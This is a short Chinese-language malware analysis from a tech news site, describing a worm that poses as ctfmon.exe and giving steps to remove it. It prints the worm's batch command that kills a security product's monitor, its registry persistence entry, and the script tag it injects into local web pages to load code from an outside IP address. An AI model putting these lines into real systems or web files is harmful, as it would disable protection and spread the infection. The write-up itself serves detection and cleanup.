至顶网›网络频道 ›蠕虫ctfmon.exe病毒分析解决

蠕虫ctfmon.exe病毒分析解决

扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条

下面看看ctfmon.exe的分析，1、断开网络，使用wsyscheck终止并删除伪ctfmon.exe。2、使用wsyscheck删除ctfmon的开机启动项。

作者：论坛整理 2007年11月21日

关键字： ctfmon ctfmon.exe ctfmon.exe病毒 ctfmon.exe进程 ctfmon.exe木马 ctfmon.exe病毒专杀

下面看看ctfmon.exe的分析：

文件名称：ctfmon.exe
文件大小：45,056 字节
AV命名：Win32.HLLW.Rubbish (Dr.Web v4.44);Worm.Win32.Downloader.c (kav 7.0.0.125)

加壳方式：N/A
编写语言：Microsoft Visual C++ 6.0
病毒类型：蠕虫
文件MD5：6ede432a957fbbba10e2284819fe8d6e
传播方式：网页漏洞

行为分析：

1.释放批处理：
%Systemroot%\system32\tmipo.bat (24 字节)
用记事本打开.可见 taskkill /im 360tray.exe
然后进程cmd启动conime.exe。

2.修改注册表，添加开机启动项
注册表键： HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注册表值： svchost
类型: REG_SZ
值： C:\Documents and Settings\Administrator\桌面\ctfmon.exe
注：值为ctfmon.exe的所在路径

3.激活批处理tmipo.bat终止360安全卫士实时监控程序
命令行 taskkill /im 360tray.exe

4.然后svchost.exe启动wmiprvse.exe -Embedding
命令行：C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

5.连接网络 218.75.91.248

6.遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，插入一段JS代码：
<script language=javascript src=http://218.75.91.248/qq.js></script>

解决方法：
1、断开网络，使用wsyscheck终止并删除伪ctfmon.exe

2、使用wsyscheck删除ctfmon的开机启动项

3、使用iframekill清除被插入代码的网页

VIP专区

VIP用户

普通用户

邮件订阅

如果您非常迫切的想了解IT领域最新产品与技术信息，那么订阅至顶网技术邮件将是您的最佳途径之一。

重磅专题

往期文章

蠕虫ctfmon.exe病毒分析解决

业界热点: